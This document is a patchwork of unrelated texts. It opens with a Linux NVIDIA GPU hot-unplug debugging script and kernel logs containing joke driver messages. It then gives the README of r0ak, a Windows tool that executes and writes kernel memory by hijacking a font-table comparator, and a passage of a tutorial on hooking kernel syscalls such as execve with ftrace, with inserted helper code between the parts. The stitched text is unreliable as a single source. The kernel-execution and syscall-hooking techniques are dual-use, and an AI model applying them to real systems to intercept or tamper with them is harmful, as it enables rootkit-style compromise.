Here are some handy scripts I was using while debugging it:

#!/bin/sh -ex
modprobe acpi_ipmi
insmod nvidia.ko NVreg_ResmanDebugLevel=-1 NVreg_CheckPCIConfigSpace=0
insmod nvidia-modeset.ko

dmesg -w

rmmod nvidia-modeset
rmmod nvidia

exec Xorg :8 -config /etc/bumblebee/xorg.conf.nvidia -configdir /etc/bumblebee/xorg.conf.d -sharevts -nolisten tcp -noreset -verbose 3 -isolateDevice PCI:06:00:0 -modulepath /usr/lib/nvidia/nvidia,/usr/lib/xorg/modules

And finally, here are the relevant kernel and Xorg log messages, showing what happens when a GPU is unplugged:

[  219.524218] NVRM: loading NVIDIA UNIX x86_64 Kernel Module  390.87  Tue Aug 21 12:33:05 PDT 2018 (using threaded interrupts)
[  219.527409] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[  224.780721] nvidia-modeset: nvkms_open_gpu called with 00000600, pid 4560
[  224.807370] nvidia-modeset: detected gpu 00000600 open in nvkms_ioctl_common, pid 4560
[  239.061383] NVRM: GPU at PCI:0000:06:00: GPU-9fe1319c-8dd3-44e4-2b74-de93f8b02c6a
[  239.061387] NVRM: Xid (PCI:0000:06:00): 79, GPU has fallen off the bus.
[  239.061389] NVRM: GPU at 0000:06:00.0 has fallen off the bus.
[  239.061398] NVRM: A GPU crash dump has been created. If possible, please run
               NVRM: as root to collect this data before
               NVRM: the NVIDIA kernel module is unloaded.
[  240.209498] NVRM: Attempting to remove minor device 0 with non-zero usage count!
[  240.209501] NVRM: YOLO, waiting for usage count to drop to zero
[  241.433499] nvidia-modeset: *notices ur gpu is dead* owo whats this in nvkms_ioctl_common, pid 4560
[  241.433851] nvidia-modeset: awwww u need cleanup :3 in nvkms_close_common, pid 4560
[  241.433853] nvidia-modeset: nvkms_close_gpu called with 00000600, pid 4560
[  250.440498] NVRM: Usage count is now zero, proceeding to remove the GPU
[  250.440513] NVRM: This is not actually supposed to work lol. Hope it does tho 👍
[  250.440520] NVRM: You probably want to reload nvidia-modeset now if you want any of this to ever start up again, but like, man, that's your choice entirely
[  250.440870] pci 0000:06:00.1: Dropping the link to 0000:06:00.0
[  250.440950] pci_bus 0000:06: busn_res: [bus 06] is released
[  250.440982] pci_bus 0000:07: busn_res: [bus 07-38] is released
[  250.441012] pci_bus 0000:05: busn_res: [bus 05-38] is released
[  251.000794] pci_bus 0000:02: Allocating resources
[  251.001324] pci_bus 0000:02: Allocating resources
[  253.765953] pcieport 0000:00:1c.0: AER: Corrected error received: 0000:00:1c.0
[  253.765969] pcieport 0000:00:1c.0: PCIe Bus Error: severity=Corrected, type=Physical Layer, (Receiver ID)
[  253.765976] pcieport 0000:00:1c.0:   device [8086:9d10] error status/mask=00002001/00002000
[  253.765982] pcieport 0000:00:1c.0:    [ 0] Receiver Error         (First)
[  253.841064] pcieport 0000:02:02.0: Refused to change power state, currently in D3
[  253.843882] pcieport 0000:02:00.0: Refused to change power state, currently in D3
[  253.846177] pci_bus 0000:03: busn_res: [bus 03] is released
[  253.846248] pci_bus 0000:04: busn_res: [bus 04-38] is released
[  253.846300] pci_bus 0000:39: busn_res: [bus 39] is released
[  253.846348] pci_bus 0000:02: busn_res: [bus 02-39] is released
[  353.369487] nvidia-modeset: im just gonna leak all the kms junk ok? haha nvm wasnt a question. in nvkms_exit
[  357.600350] nvidia-modeset: Loading NVIDIA Kernel Mode Setting Driver for UNIX platforms  390.87  Tue Aug 21 16:16:14 PDT 2018
[   244.798] (EE) NVIDIA(GPU-0): WAIT (2, 8, 0x8000, 0x000011f4, 0x00001210)

R0Ak (The Ring 0 Army Knife): A Command Line Utility to Read/Write/Execute Ring Zero on Windows 10 Systems

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything else other than Administrator privileges.

Quick Peek

r0ak v1.0.0 -- Ring 0 Army Knife
Copyright (c) 2018 Alex Ionescu [@aionescu]

USAGE: r0ak.exe
       [--execute <Address | module.ext!function> <Argument>]
       [--write   <Address | module.ext!function> <Value>]
       [--read    <Address | module.ext!function> <Size>]


The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg), SysInternals Tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:

  • Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
  • Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
  • Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers as generic «read-write-everything» drivers are frowned upon.
  • Windows 10 Spring Update now includes customer-facing options for enabling HyperVisor Code Integrity (HVCI) which further restricts allowable drivers and blacklists multiple 3rd party drivers that had «read-write-everything» capabilities due to poorly written interfaces and security risks.
  • Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution ‘tricks’ obsolete, so a new approach is needed.

In such an environment, it was clear that a simple tool could be valuable for the community: one that serves as an emergency band-aid/hotfix and helps to quickly troubleshoot kernel/system-level issues that become apparent when analyzing kernel state.

How it Works

Basic Architecture

r0ak works by redirecting the execution flow of the window manager’s trusted font validation checks when attempting to load a new font, by replacing the trusted font table’s comparator routine with an alternate function which schedules an executive work item (WORK_QUEUE_ITEM) stored in the input node. Then, the trusted font table’s right child (which serves as the root node) is overwritten with a named pipe’s write buffer (NP_DATA_ENTRY) in which a custom work item is stored. This item’s underlying worker function and its parameter are what will eventually be executed by a dedicated ExpWorkerThread at PASSIVE_LEVEL once a font load is attempted and the comparator routine executes, receiving the named pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.

Supported Commands
When using the --execute option, this function and parameter are supplied by the user.
When using --write, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using --read, the write gadget is used to modify the system’s HSTI buffer pointer and size (N.B.: This is destructive behavior in terms of any other applications that will request the HSTI data. As this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy the data back into the tool’s user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed Windows functionality is used, and all called functions are part of the KCFG bitmap, no security checks are violated, no debugging flags are required, and no poorly written 3rd party drivers are needed.


Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool is only possible due to the elevated/privileged security context of the Administrator account on Windows, and is understood to be a by-design behavior.

Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Research Centre (MSRC) which responded: «[…] doesn’t fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won’t be pursuing this to fix.»
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection: AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, who agreed this was currently out of scope of Windows’s architectural security boundaries. This is because there are literally dozens, if not more, of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.

Can’t this be packaged up as part of an end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:

  • Require the target machine to be running Windows 10 Anniversary Update x64 or later
  • Have already elevated privileges to SYSTEM
  • Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
  • Require the Windows SDK/WDK installed on the target machine
  • Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk

Attackers interested in using this particular approach — versus very many others more cross-compatible, no-SYSTEM-right-requiring techniques — likely already adapted their own code based on the Proof-of-Concept from April 2015 — more than 3 years ago.


Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will look up your installation path automatically, and leverage the DbgHelp.dll and SymSrv.dll that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source code to use them.
Usage of symbols requires an Internet connection, unless you have pre-cached them locally. Additionally, you should set up the _NT_SYMBOL_PATH variable pointing to an appropriate symbol server and cached location.
It is assumed that an IT Expert or other troubleshooter who apparently has a need to read/write/execute kernel memory (and has knowledge of the appropriate kernel variables to access) is already more than intimately familiar with the above setup requirements. Please do not file issues asking what the SDK is or how to set an environment variable.

Use Cases

  • Some driver leaked kernel pool? Why not call ntoskrnl.exe!ExFreePool and pass in the kernel address that’s leaking? What about an object reference? Go call ntoskrnl.exe!ObfDereferenceObject and have that cleaned up.
  • Want to dump the kernel DbgPrint log? Why not dump the internal circular buffer at ntoskrnl.exe!KdPrintCircularBuffer?
  • Wondering how big the kernel stacks are on your machine? Try looking at ntoskrnl.exe!KeKernelStackSize
  • Want to dump the system call table to look for hooks? Go print out ntoskrnl.exe!KiServiceTable

These are only a few examples — all Ring 0 addresses are accepted, either by module!symbol syntax or directly passing the kernel pointer if known. The Windows Symbol Engine is used to look these up.
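The two accepted target forms can be told apart with very little code. The sketch below is not taken from the r0ak sources: `parse_target`, `struct target` and the buffer sizes are hypothetical names and values chosen for illustration, and the actual symbol resolution (done by the Windows Symbol Engine) is left out.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical result type: not taken from the r0ak sources. */
enum target_kind { TARGET_INVALID, TARGET_ADDRESS, TARGET_SYMBOL };

struct target {
    enum target_kind kind;
    unsigned long long address;   /* valid when kind == TARGET_ADDRESS */
    char module[64];              /* valid when kind == TARGET_SYMBOL  */
    char symbol[128];             /* valid when kind == TARGET_SYMBOL  */
};

/* Classify a command-line target as "module.ext!function" or a raw pointer. */
static struct target parse_target(const char *arg)
{
    struct target t = { TARGET_INVALID, 0, "", "" };
    const char *bang;
    char *end;

    assert(arg != NULL);
    bang = strchr(arg, '!');
    if (bang != NULL) {
        size_t mod_len = (size_t)(bang - arg);
        size_t sym_len = strlen(bang + 1);

        /* Both halves must be non-empty and fit the fixed buffers. */
        if (mod_len == 0 || sym_len == 0 ||
            mod_len >= sizeof(t.module) || sym_len >= sizeof(t.symbol))
            return t;
        memcpy(t.module, arg, mod_len);
        t.module[mod_len] = '\0';
        memcpy(t.symbol, bang + 1, sym_len + 1);
        t.kind = TARGET_SYMBOL;
        return t;
    }

    /* No '!': treat the argument as a hexadecimal kernel pointer. */
    errno = 0;
    t.address = strtoull(arg, &end, 16);
    if (errno == 0 && end != arg && *end == '\0')
        t.kind = TARGET_ADDRESS;
    return t;
}
```

A symbol target would still have to be handed to the symbol engine to obtain an address; an address target can be used as-is.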

The tool requires certain kernel variables and functions that are only known to exist in modern versions of Windows 10, and was only meant to work on 64-bit systems. These limitations are due to the fact that on older systems (or x86 systems), these stricter security requirements don’t exist, and as such, more traditional approaches can be used instead. This is a personal tool which I am making available, and I had no need for these older systems, where I could use a simple driver instead. That being said, this repository accepts pull requests, if anyone is interested in porting it.
Secondly, due to the use cases and my own needs, the following restrictions apply:

  • Reads — Limited to 4 GB of data at a time
  • Writes — Limited to 32-bits of data at a time
  • Executes — Limited to functions which only take 1 scalar parameter

Obviously, these limitations could be fixed by programmatically choosing a different approach, but they fit the needs of a command line tool and my use cases. Again, pull requests are accepted if others wish to contribute their own additions.
Note that all execution (including execution of the --read and --write commands) occurs in the context of a System Worker Thread at PASSIVE_LEVEL. Therefore, user-mode addresses should not be passed in as parameters/arguments.
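Because a write covers only 32 bits, changing a 64-bit value takes two writes. The sketch below only shows how such a value could be split into two requests; `split_write64` and `struct write32` are hypothetical helpers, not part of the tool, and a little-endian target is assumed (which holds for x64 Windows).

```c
#include <assert.h>
#include <stdint.h>

/* One 32-bit write request: where to write and what to write. */
struct write32 {
    uint64_t address;
    uint32_t value;
};

/*
 * Split a 64-bit store into two 32-bit stores, low half first.
 * Assumes a little-endian target, which holds for x64 Windows.
 */
static void split_write64(uint64_t address, uint64_t value,
                          struct write32 out[2])
{
    assert(out != 0);
    out[0].address = address;
    out[0].value   = (uint32_t)(value & 0xFFFFFFFFu);
    out[1].address = address + 4;
    out[1].value   = (uint32_t)(value >> 32);
}
```

The two stores are not atomic as a pair: between them the target holds a half-updated value, so this is a poor fit for pointers that other code may read concurrently.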

Hooking Linux Kernel Functions, how to Hook Functions with Ftrace

Ftrace is a Linux kernel framework for tracing Linux kernel functions. But our team managed to find a new way to use ftrace when trying to enable system activity monitoring to be able to block suspicious processes. It turns out that ftrace allows you to install hooks from a loadable GPL module without rebuilding the kernel. This approach works for Linux kernel versions 3.19 and higher for the x86_64 architecture.

A new approach: Using ftrace for Linux kernel hooking

What is ftrace? Basically, ftrace is a framework used for tracing the kernel on the function level. This framework has been in development since 2008 and has quite an impressive feature set. What data can you usually get when you trace your kernel functions with ftrace? Linux ftrace displays call graphs, tracks the frequency and length of function calls, filters particular functions by templates, and so on. Further down this article you’ll find references to official documents and sources you can use to learn more about the capabilities of ftrace.

The implementation of ftrace is based on the compiler options -pg and -mfentry. These compiler options insert a call to a special tracing function, mcount() or __fentry__(), at the beginning of every function. In user programs, profilers use this compiler capability for tracking calls of all functions. In the kernel, however, these functions are used for implementing the ftrace framework.

Calling ftrace from every function is, of course, pretty costly. This is why there’s an optimization available for popular architectures: dynamic ftrace. If ftrace isn’t in use, it barely affects the system, because the kernel knows where the calls to mcount() or __fentry__() are located and replaces their machine code with nop (an instruction that does nothing) at an early stage. When tracing is turned on, the ftrace calls are added back to the necessary functions.
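At the byte level, the idea behind dynamic ftrace can be modelled in user space. The sketch below patches a 5-byte call site in an ordinary buffer, switching between a `call rel32` and the 5-byte x86 NOP. It is a simplified model only: the helper names are hypothetical, and the real kernel uses its own text-patching machinery with proper synchronization between CPUs.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define CALL_SITE_SIZE 5   /* length of "call rel32" on x86_64 */

/* 5-byte x86 NOP: nopl 0x0(%rax,%rax,1). */
static const uint8_t nop5[CALL_SITE_SIZE] = { 0x0f, 0x1f, 0x44, 0x00, 0x00 };

/* Overwrite a call site with the 5-byte NOP (tracing disabled). */
static void site_disable(uint8_t *site)
{
    assert(site != NULL);
    memcpy(site, nop5, CALL_SITE_SIZE);
}

/*
 * Overwrite a call site with "call target" (tracing enabled).
 * site_addr is the address the site would have in memory; the 32-bit
 * displacement is measured from the end of the instruction and stored
 * in little-endian byte order.
 */
static void site_enable(uint8_t *site, uint64_t site_addr, uint64_t target)
{
    uint32_t rel = (uint32_t)(target - (site_addr + CALL_SITE_SIZE));

    assert(site != NULL);
    site[0] = 0xe8;                 /* opcode of call rel32 */
    site[1] = (uint8_t)(rel);
    site[2] = (uint8_t)(rel >> 8);
    site[3] = (uint8_t)(rel >> 16);
    site[4] = (uint8_t)(rel >> 24);
}

/* Report whether a call site currently holds the NOP. */
static int site_is_nop(const uint8_t *site)
{
    return memcmp(site, nop5, CALL_SITE_SIZE) == 0;
}
```

Since both encodings are exactly five bytes long, the surrounding code never moves; only the site itself is rewritten.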

Description of necessary functions

The following structure can be used for describing each hooked function:


/**
 * struct ftrace_hook    describes the hooked function
 *
 * @name:                the name of the hooked function
 *
 * @function:            the address of the wrapper function that will be called instead
 *                       of the hooked function
 *
 * @original:            a pointer to the place where the address
 *                       of the hooked function should be stored, filled out during installation
 *                       of the hook
 *
 * @address:             the address of the hooked function, filled out during installation
 *                       of the hook
 *
 * @ops:                 ftrace service information, initialized by zeros;
 *                       initialization is finished during installation of the hook
 */
struct ftrace_hook {
        const char *name;
        void *function;
        void *original;

        unsigned long address;
        struct ftrace_ops ops;
};

There are only three fields that the user needs to fill in: name, function, and original. The rest of the fields are considered to be implementation details. You can put the description of all hooked functions together and use macros to make the code more compact:


#define HOOK(_name, _function, _original)                    \
        {                                                    \
            .name = (_name),                                 \
            .function = (_function),                         \
            .original = (_original),                         \
        }

static struct ftrace_hook hooked_functions[] = {
        HOOK("sys_clone",   fh_sys_clone,   &real_sys_clone),
        HOOK("sys_execve",  fh_sys_execve,  &real_sys_execve),
};

This is what the hooked function wrapper looks like:

/*
 * It's a pointer to the original system call handler execve().
 * It can be called from the wrapper. It's extremely important to keep the function signature
 * without any changes: the order, types of arguments, returned value,
 * and ABI specifier (pay attention to "asmlinkage").
 */
static asmlinkage long (*real_sys_execve)(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp);

/*
 * This function will be called instead of the hooked one. Its arguments are
 * the arguments of the original function. Its return value will be passed on to
 * the calling function. This function can execute arbitrary code before, after,
 * or instead of the original function.
 */
static asmlinkage long fh_sys_execve(const char __user *filename,
                const char __user *const __user *argv,
                const char __user *const __user *envp)
{
        long ret;

        pr_debug("execve() called: filename=%p argv=%p envp=%p\n",
                filename, argv, envp);

        ret = real_sys_execve(filename, argv, envp);

        pr_debug("execve() returns: %ld\n", ret);

        return ret;
}

Now, hooked functions have a minimum of extra code. The only thing requiring special attention is the function signatures. They must be completely identical; otherwise, the arguments will be passed on incorrectly and everything will go wrong. This isn’t as important for hooking system calls, though, since their handlers are pretty stable and, for performance reasons, the system call ABI and function call ABI use the same layout of arguments in registers. However, if you’re going to hook other functions, remember that the kernel has no stable interfaces.

Initializing ftrace

Our first step is finding and saving the hooked function address. As you probably know, when using ftrace, Linux kernel tracing can be performed by the function name. However, we still need to know the address of the original function in order to call it.

You can use kallsyms — a list of all kernel symbols — to get the address of the needed function. This list includes not only symbols exported for the modules but actually all symbols. This is what the process of getting the hooked function address can look like:

static int resolve_hook_address(struct ftrace_hook *hook)
{
        hook->address = kallsyms_lookup_name(hook->name);

        if (!hook->address) {
                pr_debug("unresolved symbol: %s\n", hook->name);
                return -ENOENT;
        }

        /* Store the resolved address where the wrapper expects to find it. */
        *((unsigned long *) hook->original) = hook->address;

        return 0;
}
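The same symbol list is exposed to user space as the text file /proc/kallsyms, one symbol per line in the form "address type name". As a rough illustration of what a lookup by name amounts to, here is a user-space sketch that matches a single line of that format. `parse_kallsyms_line` is a hypothetical helper, not a kernel API, and on many systems unprivileged readers see zeroed addresses in that file.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse one "/proc/kallsyms"-style line: "<hex address> <type> <name>".
 * Returns 1 and stores the address if the line describes `wanted`,
 * otherwise returns 0 and leaves *address untouched.
 */
static int parse_kallsyms_line(const char *line, const char *wanted,
                               unsigned long long *address)
{
    unsigned long long addr;
    char type;
    char name[256];

    assert(line != NULL && wanted != NULL && address != NULL);
    if (sscanf(line, "%llx %c %255s", &addr, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;
    *address = addr;
    return 1;
}
```

Inside a module, the lookup in resolve_hook_address() does the equivalent search against the kernel's in-memory table instead of a text file.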

Next, we need to initialize the ftrace_ops structure. Here we have one necessary field, func, pointing to the callback. However, some critical flags are needed:

int fh_install_hook(struct ftrace_hook *hook)
{
        int err;

        err = resolve_hook_address(hook);
        if (err)
                return err;

        hook->ops.func = fh_ftrace_thunk;
        hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
                        | FTRACE_OPS_FL_IPMODIFY;

        /* ... */
}

The fh_ftrace_thunk() function is our callback that ftrace will call when tracing the function. We’ll talk about this callback later. The flags are needed for hooking: they instruct ftrace to save and restore the processor registers, whose contents we’ll be able to change in the callback.

Now we’re ready to turn on the hook. First, we use ftrace_set_filter_ip() to turn on the ftrace utility for the needed function. Second, we use register_ftrace_function() to give ftrace permission to call our callback:

int fh_install_hook(struct ftrace_hook *hook)
{
        /* ... */

        err = ftrace_set_filter_ip(&hook->ops, hook->address, 0, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
                return err;
        }

        err = register_ftrace_function(&hook->ops);
        if (err) {
                pr_debug("register_ftrace_function() failed: %d\n", err);

                /* Don't forget to turn off ftrace in case of an error. */
                ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);

                return err;
        }

        return 0;
}

To turn off the hook, we repeat the same actions in reverse:

void fh_remove_hook(struct ftrace_hook *hook)
{
        int err;

        err = unregister_ftrace_function(&hook->ops);
        if (err)
                pr_debug("unregister_ftrace_function() failed: %d\n", err);

        err = ftrace_set_filter_ip(&hook->ops, hook->address, 1, 0);
        if (err) {
                pr_debug("ftrace_set_filter_ip() failed: %d\n", err);
        }
}

When the unregister_ftrace_function() call is over, it’s guaranteed that there won’t be any activations of the installed callback or our wrapper in the system. We can unload the hook module without worrying that our functions are still being executed somewhere in the system. Next, we provide a detailed description of the function hooking process.
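With more than one hook, installation would typically walk the whole hooked_functions array and roll back on the first failure. The following is a user-space model of that pattern only: `install_hook()` and `remove_hook()` are stubs standing in for fh_install_hook() and fh_remove_hook(), `struct hook` is a simplified, hypothetical stand-in for struct ftrace_hook, and the failing symbol name is made up.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simplified stand-in for the article's struct ftrace_hook. */
struct hook {
    const char *name;
    int installed;
};

/* Stub for fh_install_hook(): fails for a name we pretend is unresolved. */
static int install_hook(struct hook *h)
{
    if (strcmp(h->name, "missing_symbol") == 0)
        return -2;               /* stands in for -ENOENT */
    h->installed = 1;
    return 0;
}

/* Stub for fh_remove_hook(). */
static void remove_hook(struct hook *h)
{
    h->installed = 0;
}

/* Install every hook; on failure, undo the ones already installed. */
static int install_hooks(struct hook *hooks, size_t count)
{
    size_t i;
    int err = 0;

    assert(hooks != NULL);
    for (i = 0; i < count; i++) {
        err = install_hook(&hooks[i]);
        if (err)
            break;
    }
    if (err) {
        /* Roll back in reverse order so no hook stays half-installed. */
        while (i != 0)
            remove_hook(&hooks[--i]);
    }
    return err;
}

/* Remove every hook, mirroring a module's exit path. */
static void remove_hooks(struct hook *hooks, size_t count)
{
    size_t i;

    assert(hooks != NULL);
    for (i = 0; i < count; i++)
        remove_hook(&hooks[i]);
}
```

In a module, `install_hooks()` would be called from the init function and `remove_hooks()` from the exit function, so a failed load never leaves a subset of hooks active.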

Hooking functions with ftrace

So how can you configure kernel function hooking? The process is pretty simple: ftrace is able to alter the register state after exiting the callback. By changing the register %rip — a pointer to the next executed instruction — we can change the function executed by the processor. In other words, we can force the processor to make an unconditional jump from the current function to ours and take over control.

This is what the ftrace callback looks like:

static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);

        regs->ip = (unsigned long) hook->function;
}

We get the address of struct ftrace_hook for our function using the container_of() macro and the address of the struct ftrace_ops embedded in struct ftrace_hook. Next, we substitute the value of the register %rip in the struct pt_regs structure with our handler’s address. For architectures other than x86_64, this register can have a different name (like PC or IP). The basic idea, however, still applies.
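The container_of() trick works because the ops structure is embedded in the hook structure rather than referenced through a pointer. A minimal user-space sketch of the same pointer arithmetic follows; `struct fake_ops`, `struct fake_hook` and `hook_from_ops` are hypothetical stand-ins, and the macro is a simplified version without the kernel's type checking.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace equivalent of the kernel's container_of() (no type checking). */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

/* Stand-ins for struct ftrace_ops and struct ftrace_hook. */
struct fake_ops {
    unsigned long flags;
};

struct fake_hook {
    const char *name;
    void *function;
    struct fake_ops ops;   /* embedded, not a pointer */
};

/* Given only the embedded ops, recover the hook that contains it. */
static struct fake_hook *hook_from_ops(struct fake_ops *ops)
{
    assert(ops != NULL);
    return container_of(ops, struct fake_hook, ops);
}
```

Subtracting the member's offset from the member's address yields the address of the enclosing structure, which is why the callback needs no lookup table to find its hook.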

Note that the notrace specifier added for the callback requires special attention. This specifier can be used for marking functions that are prohibited for Linux kernel tracing with ftrace. For instance, you can mark ftrace functions that are used in the tracing process. By using this specifier, you can prevent the system from hanging if you accidentally call a function from your ftrace callback that’s currently being traced by ftrace.

The ftrace callback is usually called with preemption disabled (just like kprobes), although there might be some exceptions. But in our case, this limitation wasn’t important since we only needed to replace eight bytes of the %rip value in the pt_regs structure.

Since the wrapper function and the original are executed in the same context, both functions have the same restrictions. For instance, if you hook an interrupt handler, then sleeping in the wrapper is still out of the question.

Protection from recursive calls

There’s one catch in the code we gave you before: when the wrapper calls the original function, the original function will be traced by ftrace again, thus causing an endless recursion. We came up with a pretty neat way of breaking this cycle by using parent_ip — one of the ftrace callback arguments that contains the return address to the function that called the hooked one. Usually, this argument is used for building function call graphs. However, we can use this argument to distinguish the first traced function call from the repeated calls.

The difference is significant: during the first call, the argument parent_ip will point to some place in the kernel, while during the repeated call it will point inside our wrapper. You should pass control to the wrapper only during the first call. All other calls must let the original function be executed.

We can run the entry test by comparing the address to the boundaries of the current module with our functions. However, this approach works only if the module doesn’t contain anything other than the wrapper that calls the hooked function. Otherwise, you’ll need to be more picky.
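The boundary comparison can be modelled in plain C. In the sketch below, `struct module_range`, `addr_within` and `next_ip` are hypothetical names that only illustrate the decision; all addresses are made-up numbers rather than real kernel pointers.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical description of where a module's code lives. */
struct module_range {
    uintptr_t base;
    uintptr_t size;
};

/* Model of the check: does addr fall inside [base, base + size)? */
static int addr_within(uintptr_t addr, const struct module_range *m)
{
    assert(m != 0);
    return addr >= m->base && addr - m->base < m->size;
}

/*
 * Decide where execution continues. If the caller is outside our module,
 * redirect to the wrapper; if the call came from the wrapper itself,
 * leave the instruction pointer alone so the original function runs.
 */
static uintptr_t next_ip(uintptr_t current_ip, uintptr_t parent_ip,
                         uintptr_t wrapper, const struct module_range *self)
{
    if (!addr_within(parent_ip, self))
        return wrapper;
    return current_ip;
}
```

Writing the range test as `addr - base < size` avoids computing `base + size`, which could overflow for a range near the top of the address space.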

So this is what a correct ftrace callback looks like:

static void notrace fh_ftrace_thunk(unsigned long ip, unsigned long parent_ip,
                struct ftrace_ops *ops, struct pt_regs *regs)
{
        struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);

        /* Skip the function calls from the current module. */
        if (!within_module(parent_ip, THIS_MODULE))
                regs->ip = (unsigned long) hook->function;
}

This approach has three main advantages:

  • Low overhead costs. You need to perform only a few comparisons and subtractions without grabbing any spinlocks or iterating through lists.
  • It doesn’t have to be global. Since there’s no synchronization, this approach is compatible with preemption and isn’t tied to the global process list. As a result, you can trace even interrupt handlers.
  • There are no limitations for functions. This approach doesn’t have the main kretprobes drawback and can support any number of trace function activations (including recursive) out of the box. During recursive calls, the return address is still located outside of our module, so the callback test works correctly.

In the next section, we take a more detailed look at the hooking process and describe how ftrace works.

The scheme of the hooking process

So, how does ftrace work? Let’s take a look at a simple example: you’ve typed the command ls in the terminal to see the list of files in the current directory. The command-line interpreter (say, Bash) launches a new process using the common functions fork() plus execve() from the standard C library. Inside the system, these functions are implemented through system calls clone() and execve() respectively. Let’s suppose that we hook the execve() system call to gain control over launching new processes.

Figure 1 below gives an ftrace example and illustrates the process of hooking a handler function.

Figure 1. Linux kernel hooking with ftrace.

In this image, we can see how a user process (blue) executes a system call to the kernel (red) where the ftrace framework (violet) calls functions from our module (green).

Below, we give a more detailed description of each step of the process:

  1. The SYSCALL instruction is executed by the user process. This instruction allows switching to the kernel mode and puts the low-level system call handler entry_SYSCALL_64() in charge. This handler is responsible for all system calls of 64-bit programs on 64-bit kernels.
  2. A specific handler receives control. The kernel quickly completes the low-level tasks implemented in assembly and hands over control to the high-level do_syscall_64() function, which is written in C. This function looks up the system call handler table sys_call_table and calls a particular handler by the system call number. In our case, it’s the function sys_execve().
  3. Calling ftrace. There’s an __fentry__() function call at the beginning of every kernel function. This function is implemented by the ftrace framework. In the functions that don’t need to be traced, this call is replaced with the instruction nop. However, in the case of the sys_execve() function, no such replacement takes place, so the call is executed.
  4. Ftrace calls our callback. Ftrace calls all registered trace callbacks, including ours. Other callbacks won’t interfere since, at each particular place, only one callback can be installed that changes the value of the %rip register.
  5. The callback performs the hooking. The callback looks at the value of parent_ip leading inside the do_syscall_64() function — since it’s the particular function that called the sys_execve() handler — and decides to hook the function, changing the values of the register %rip in the pt_regs structure.
  6. Ftrace restores the state of the registers. Following the FTRACE_OPS_FL_SAVE_REGS flag, the framework saves the register state in the pt_regs structure before it calls the handlers. When the handling is over, the registers are restored from the same structure. Our handler changes the register %rip (a pointer to the next executed instruction), which leads to passing control to a new address.
  7. Wrapper function receives control. An unconditional jump makes it look like the activation of the sys_execve() function has been terminated. Instead of this function, control goes to our function, fh_sys_execve(). Meanwhile, the state of both processor and memory remains the same, so our function receives the arguments of the original handler and, when it finishes, returns control to the do_syscall_64() function.
  8. The original function is called by our wrapper. Now, the system call is under our control. After analyzing the context and arguments of the system call, the fh_sys_execve() function can either permit or prohibit execution. If execution is prohibited, the function returns an error code. Otherwise, the function needs to repeat the call to the original handler and sys_execve() is called again through the real_sys_execve pointer that was saved during the hook setup.
  9. The callback gets control. Just like during the first call of sys_execve(), control goes through ftrace to our callback. But this time, the process ends differently.
